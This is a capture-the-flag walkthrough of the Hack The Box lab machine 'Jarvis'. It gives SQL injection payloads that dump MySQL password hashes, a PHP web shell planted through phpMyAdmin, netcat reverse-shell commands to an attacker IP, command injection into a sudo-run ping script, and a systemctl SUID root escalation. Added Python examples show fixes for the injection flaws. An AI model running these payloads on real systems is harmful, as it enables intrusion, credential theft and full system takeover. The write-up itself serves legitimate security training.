Jarvis
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.143 -oN allPorts
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of the nmap timing templates.
-Pn: assume the host is online.
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
As we see, only ports 22, 80 and 64999 are open.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80,64999 10.10.10.143 -oN targeted
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
We have an HTTP server running on ports 80 and 64999. If we look at the website on port 80, we should see the Stark Hotel website.
On the other hand, if we take a look at the website on port 64999, we should see a message saying that we are banned.
Let's enumerate the box a bit more and run gobuster in order to list directories.
gobuster dir -u http://10.10.10.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200
dir: enumerate directories or files.
-u: the target URL.
-w: path to the wordlist.
-t: number of concurrent threads, in this case 200 threads.
Gobuster found the /phpmyadmin directory. If we take a look at it, we should see a login page.
If we inspect the hotel website, we will find the Rooms & Suites section on the main page. If we click on one of the Book now! buttons, we will be redirected to /room.php with the parameter cod, which holds the room number.
/room.php?cod=2
If we append the ' character to the end of the URL, the page doesn't show anything. The same thing happens if we change the number to a non-existing value like -1.
/room.php?cod=2'
/room.php?cod=-1
At this point, I thought that the website might be vulnerable to MySQL injection. I tried to find out how many columns the table behind this page has. I did this with the following query:
/room.php?cod=-1 union select 1,2,3,4,5,6,7,8,9,10-- -
If we run this query, we will not see anything, because the table doesn't have 10 columns. So the idea is to repeat the query while decreasing the number of columns: if nothing shows up with 10 columns, try 9; if nothing shows up with 9, try 8, and so on. With 7 columns we should see something interesting.
/room.php?cod=-1 union select 1,2,3,4,5,6,7-- -
Now we can enumerate the database by replacing one of the numbers with the data we want to display. For example, let's look at the user the database is running as.
/room.php?cod=-1 union select 1,2,user(),4,5,6,7-- -
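The UNION-based injection just described, rebuilt here as an added example (not code from the original write-up) against a constructed in-memory SQLite database, beside the parameterized query that would have closed it. The table and column names are assumptions; SQLite's || stands in for MySQL's concat().

```python
import sqlite3

# Constructed stand-in for the hotel site's database: a 7-column room table (the
# column count found on the page) and a credentials table in the role of mysql.user.
# SQLite runs in memory so the example works offline; the query shapes match MySQL.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE room(cod INTEGER, name TEXT, price INTEGER, descrip TEXT,
                          star INTEGER, image TEXT, mini TEXT);
        INSERT INTO room VALUES (2, 'Deluxe', 300, 'Sea view', 5, 'd.jpg', 'm.jpg');
        CREATE TABLE user(User TEXT, Password TEXT);
        INSERT INTO user VALUES ('DBadmin', 'constructed-hash-value');
    """)
    return conn

def room_vulnerable(conn, cod):
    """room.php as the page describes it: 'cod' is pasted straight into the SQL text.
    Any error (e.g. a UNION with the wrong column count) is swallowed, so the page
    simply shows nothing, which is the blind column-count behaviour seen above."""
    try:
        return conn.execute("SELECT * FROM room WHERE cod=" + cod).fetchall()
    except sqlite3.Error:
        return []

def room_fixed(conn, cod):
    """Hardened form: validate the type first, then bind the value as a parameter,
    so the database never interprets user input as SQL."""
    try:
        cod_int = int(cod)
    except ValueError:
        return []
    return conn.execute("SELECT * FROM room WHERE cod=?", (cod_int,)).fetchall()

# Payloads from the page, with SQLite's || standing in for MySQL's concat().
LEAK = "-1 union select 1,2,User||':'||Password,4,5,6,7 from user-- -"
WRONG_COUNT = "-1 union select 1,2,3,4,5,6,7,8,9,10-- -"

if __name__ == "__main__":
    db = build_db()
    print(room_vulnerable(db, "2"))          # the legitimate room row
    print(room_vulnerable(db, WRONG_COUNT))  # [] : column mismatch, nothing shown
    print(room_vulnerable(db, LEAK)[0][2])   # DBadmin:constructed-hash-value
    print(room_fixed(db, LEAK))              # [] : input is not an integer
```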
At this point, you could try to dump the current database, but I anticipate that you will not find any relevant information. But this is not the end. Every MySQL installation ships with default system schemas/databases, one of them being the mysql database. This database has the user table, which has the User and Password columns. Let's see if we can read the content of the user table.
/room.php?cod=-1 union select 1,2,concat(User,":",Password),4,5,6,7 from mysql.user-- -
And we got the user DBadmin and a password hash. Let's make use of rainbow tables to find out the password.
CrackStation found a password! Now that we have some credentials, let's try to log in to the /phpmyadmin login page.
And we got in!
The idea is to click on any database, for example the hotel database, and click on the SQL tab in order to run queries. MySQL allows us to write text into files if we have the right permissions to do so. We could write PHP code into a file in the /var/www/html directory so that we can access the file with the browser. The PHP code will execute, at system level, the value of the cmd parameter of the URL. This way, we will have Remote Code Execution (RCE).
If we click on GO, we should get a success message.
Now if we access the /RCE.php file with a command as the value of the cmd parameter, we should get a response.
http://10.10.10.143/RCE.php?cmd=id
It's time to get a shell. In the first place, let's set a netcat listener on port 4444.
nc -lvnp 4444
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: specify the port to listen on.
If we now access the following URL, we should get a shell.
http://10.10.10.143/RCE.php?cmd=nc -e /bin/bash 10.10.14.12 4444
First of all, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command on my local machine:
stty size
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
Let's list which commands the current user is allowed (and forbidden) to run with sudo, together with any permitted environment variable options.
sudo -l
-l: list user privileges.
We can run a Python script as the user pepper. Let's do it.
sudo -u pepper /var/www/Admin-Utilities/simpler.py
The Python script requires an option. Let's try the -p option.
It asks for an IP. If you enter the IP address of your machine and listen for ICMP packets, you will see the packets arriving properly.
tcpdump -i tun0 icmp -n
-i: select the interface.
icmp: protocol type.
-n: no DNS resolution.
Something we could try is to run a command which sends our machine a reverse shell as the user pepper.
Enter an IP: $(nc -e /bin/bash 10.10.14.12 5555)
We can't. If we inspect the script, under the exec_ping function we will see a list of characters that the script blocks.
What we can do instead is create a bash script that sends a reverse shell to our machine, and run it through the Python script.
echo "nc -e /bin/bash 10.10.14.12 5555" > /tmp/reverse.sh
chmod +x /tmp/reverse.sh
Before running the Python script, let's set another netcat listener on port 5555.
nc -lvnp 5555
-l: listen mode.
-v: verbose mode.
-n: numeric-only IP, no DNS resolution.
-p: specify the port to listen on.
If we run the Python script and execute the bash script, we should get the reverse shell as the user pepper, and we'll be able to grab the user flag.
Enter an IP: $(/tmp/reverse.sh)
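Why the character blocklist in exec_ping was not enough, shown as an added example (not the script from the box): a constructed blocklist that stands in for the real one, beside the allow-list fix that validates the input as an IP address and runs ping without a shell. The BLOCKED set and function names are assumptions.

```python
import ipaddress
import subprocess

# Constructed blocklist standing in for the one in simpler.py; the page only says the
# script rejects a list of characters before handing the input to ping via a shell.
BLOCKED = set("&;|`")

def filtered_ping_command(user_input):
    """Blocklist approach: reject listed characters, then let a shell interpret the
    rest. Returns the shell command line that would run, or None if rejected.
    Anything the list does not cover, such as command substitution, passes through."""
    if any(ch in BLOCKED for ch in user_input):
        return None
    return "ping -c 1 " + user_input

def safe_ping_argv(user_input):
    """Allow-list approach: the input must parse as an IP address, and ping is
    invoked with an argv list (no shell), so no metacharacter is ever interpreted."""
    addr = ipaddress.ip_address(user_input.strip())  # raises ValueError otherwise
    return ["ping", "-c", "1", str(addr)]

def safe_ping(user_input):
    """Validate, then execute without shell=True; returns ping's output or an error."""
    try:
        argv = safe_ping_argv(user_input)
    except ValueError:
        return "Invalid IP address"
    return subprocess.run(argv, capture_output=True, text=True).stdout

if __name__ == "__main__":
    for candidate in ["10.10.14.12", "1.1.1.1; id", "$(/tmp/reverse.sh)"]:
        print(repr(candidate), "->", filtered_ping_command(candidate))
    print(safe_ping("$(/tmp/reverse.sh)"))  # Invalid IP address
```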
Before continuing escalating privileges, let's set another interactive TTY shell. The process is the same as before.
At this point, I tried to see if there were any interesting SUID binaries.
find / -perm /4000 2>/dev/null
If we can run the systemctl command as the root user, we can create a service that sets the SUID bit on the /bin/bash binary, giving us a shell as root. Let's create the suid.service file.
To activate it we have to link and enable the service.
systemctl link /home/pepper/suid.service
systemctl enable --now /home/pepper/suid.service
Now we should see /bin/bash with the SUID bit set.
ls -l /bin/bash
Finally, if we run bash with the -p option, we should get a shell as the root user. And all we have to do is reap the harvest and take the root flag.
bash -p